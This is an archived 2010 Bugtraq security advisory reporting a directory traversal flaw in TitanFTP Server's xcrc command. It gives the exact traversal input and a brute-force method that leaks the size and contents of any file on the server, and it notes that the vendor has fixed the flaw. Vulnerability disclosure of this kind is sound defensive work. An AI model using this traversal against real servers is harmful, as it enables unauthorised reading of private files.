[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

TitanFTP Server Arbitrary File Disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: TitanFTP Server Arbitrary File Disclosure
From: bill@xxxxxxxxxxxxxxxxxxxx
Date: 15 Jun 2010 22:06:37 -0000

Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure

Details

=============

Product: TitanFTP Server

Security-Risk: high

Remote-Exploit: maybe, assuming anonymous ftp access

Local-Exploit: yes

Vendor URL: http://www.southrivertech.com/

Found By: Bill Finlayson

http://www.accensussecurity.com

Affected: Versions 8.10.1125 and likely previous

Issue:  the xcrc command is susceptible to a directory traversal attack which 
will allow disclosure of the contents of any file on the server

Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the 
file's size

xcrc ..//..//..//..//a.txt 1 2
xcrc ..//..//..//..//a.txt 1 3
...
xcrc ..//..//..//..//a.txt 1 <filesize>

when automated allows for an easy brute force attack on the crc's

Status: Submitted to Vendor 6/14/10 fixed 6/15/10

Prev by Date: Re: Dlink Di-604 router authenticated user ping tool Xss and DoS
Next by Date: Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit
Previous by thread: CORE-2010-0514: XnView MBM Processing Heap Overflow
Next by thread: Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit
Index(es):
- Date
- Thread